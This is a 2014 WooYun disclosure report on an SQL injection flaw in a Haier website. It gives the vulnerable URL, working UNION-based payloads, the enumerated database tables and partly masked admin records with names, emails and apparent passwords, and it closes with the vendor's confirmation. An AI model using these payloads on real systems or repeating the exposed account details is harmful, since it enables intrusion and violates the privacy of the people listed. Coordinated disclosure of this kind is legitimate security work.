漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-080138
漏洞标题:海尔集团某站SQL注射影响大量数据库
相关厂商:海尔集团
漏洞作者: 路人甲
提交时间:2014-10-21 13:12
修复时间:2014-12-05 13:14
公开时间:2014-12-05 13:14
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-10-21: 细节已通知厂商并且等待厂商处理中
2014-10-23: 厂商已经确认,细节仅向厂商公开
2014-11-02: 细节向核心白帽子及相关领域专家公开
2014-11-12: 细节向普通白帽子公开
2014-11-22: 细节向实习白帽子公开
2014-12-05: 细节向公众公开
简要描述:
中午没吃饭。饿(⊙o⊙)…
详细说明:
注入url:http://hope.haier.com/Article/index/detail?id=225181
参数id (get)
Payload: id=225181) AND 4781=4781 AND (1933=1933
Payload: id=225181) UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7176706171,0x634a766d7a574c724265,0x71686e6171),NULL#
web application technology: Nginx
available databases [2]:
[*] hope
[*] information_schema
漏洞证明:
Database: hope
[171 tables]
+-----------------------------------+
| de_lhope_backstage_roles_part |
| del_hope_backstage_parts |
| del_hope_backstage_roles |
| del_hope_backstage_** |
| del_hope_backstage_** |
| del_hope_circle |
| del_hope_circle_channel |
| del_hope_circle_out |
| del_hope_circle_resources |
| del_hope_circle_roles |
| del_hope_circle_roles_authority |
| del_hope_circle_shared |
| del_hope_circle_shared_folder |
| del_hope_circle_tops |
| del_hope_circle_***** |
| del_hope_credit |
| del_hope_credit_rule |
| del_hope_digg |
| del_hope_****** |
| del_hope_sso_users_v |
| del_hope_typeservice |
| del_hope_u****copy |
| del_hope_u****follow_require |
| del_xls_****s |
| hope_approve |
| hope_article |
| hope_article_category |
| hope_article_point |
| hope_article_tag |
| hope_attachment |
| hope_collect |
| hope_comments |
| hope_company |
| hope_company_category |
| hope_company_follw |
| hope_company_invite |
| hope_company_*** |
| hope_company*** |
| hope_cooperation |
| hope_country |
| hope_edm_unsubscribe |
| hope_expert |
| hope_expert_imgs |
| hope_expert_news |
| hope_expert_point |
| hope_expert_reply |
| hope_experts_category |
| hope_experts_roles |
| hope_experts_roles_category |
| hope_feedback |
| hope_group |
| hope_group_attachment |
| hope_group_invite |
| hope_group_role |
| hope_group_role_auth |
| hope_group_tag |
| hope_group_topic |
| hope_group_topic_vote |
| hope_group_topic_vote_user |
| hope_group_user |
| hope_idm_usercode |
| hope_inbox_atme |
| hope_inbox_message |
| hope_inbox_remind |
| hope_inbox_reply |
| hope_inbox_reply_user |
| hope_industry_type |
| hope_keywords_log |
| hope_library |
| hope_library_tag |
| hope_location |
| hope_mail_address |
| hope_mail_cron |
| hope_mail_queue |
| hope_mail_temp |
| hope_node |
| hope_notify |
| hope_province |
| hope_recommend |
| hope_recommend_click_log |
| hope_require |
| hope_require_banner |
| hope_require_belongs |
| hope_require_category |
| hope_require_cooperation |
| hope_require_delay_notice |
| hope_require_doc |
| hope_require_follow |
| hope_require_invite |
| hope_require_invite_resource |
| hope_require_recommend_technology |
| hope_require_reject |
| hope_require_score |
| hope_require_status_time |
| hope_require_tag |
| hope_resource |
| hope_right |
| hope_roles |
| hope_roles_authority |
| hope_roles_authority_n_users |
| hope_roles_n_authority |
| hope_roles_n_user |
| hope_solutions |
| hope_solutions_banner |
| hope_solutions_belongs |
| hope_solutions_comment |
| hope_solutions_cooperation |
| hope_solutions_doc |
| hope_solutions_mature |
| hope_solutions_score |
| hope_solutions_status_time |
| hope_solutions_tag |
| hope_subscription |
| hope_supplier |
| hope_supplier_question |
| hope_supplier_rule |
| hope_sys_interact |
| hope_tag |
| hope_tasktype |
| hope_tdate |
| hope_technology |
| hope_technology_category |
| hope_technology_cooperation |
| hope_technology_invite |
| hope_technology_invite_resource |
| hope_technology_score |
| hope_technology_tag |
| hope_topic |
| hope_topic_boddys |
| hope_topic_favorites |
| hope_topic_otherfollows |
| hope_topic_subscribe |
| hope_topic_top |
| hope_topic_visitor |
| ho** |
| hope_user_action_log |
| hope_user_cas_bak |
| hope_user_company |
| hope_user_credits_log |
| hope_user_invite |
| hope_user_login_log |
| hope_user_oauth |
| hope_user_oauthinfo |
| hope_user_seach_log |
| hope_user_tag |
| hope_user_verify |
| hope_user_verify_comments |
| hope_user_verify_typeservice |
| hope_userfollow |
| hope_userskill |
| hope_visit_details |
| hope_visit_tongji |
| hope_visit_tongji_details |
| hope_vote_result |
| hope_wx_answer |
| hope_wx_answer_robot |
| hope_wx_answer_third |
| hope_wx_article |
| hope_wx_config |
| hope_wx_menu |
| hope_wx_message_image |
| hope_wx_message_location |
| hope_wx_message_text |
| hope_wx_message_voice |
| hope_wx_news |
| hope_wx_user |
| hope_zone |
| hope_zone_registration |
| hope_zone_registration_doc |
| hope_zone_reply |
| log_area_ip |
+-----------------------------------+
1,50,系统管理员,admin@iha**,adm**
105,50,陈*,chenw*001@chaoshu,chen*
106,50,刘培*,haier123,liu*****
108,50,李**,ld*@shu001.com,lid***@shu001.com
109,50,海立方管理员,**@ihaier.com,*@163.com
110,50,姚*,y*i@*u,yao*****
111,50,赵淑*,zhaos**,zhao**@haier.com
剩下就是找后台了。
修复方案:
~~
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:9
确认时间:2014-10-23 11:33
厂商回复:
感谢白帽子路人甲的测试与发现,针对此问题我们内部进行了全面检查,的确有些漏洞与问题,我司正在积极修复,同时也希望各位大侠能够继续支持海尔。
最新状态:
暂无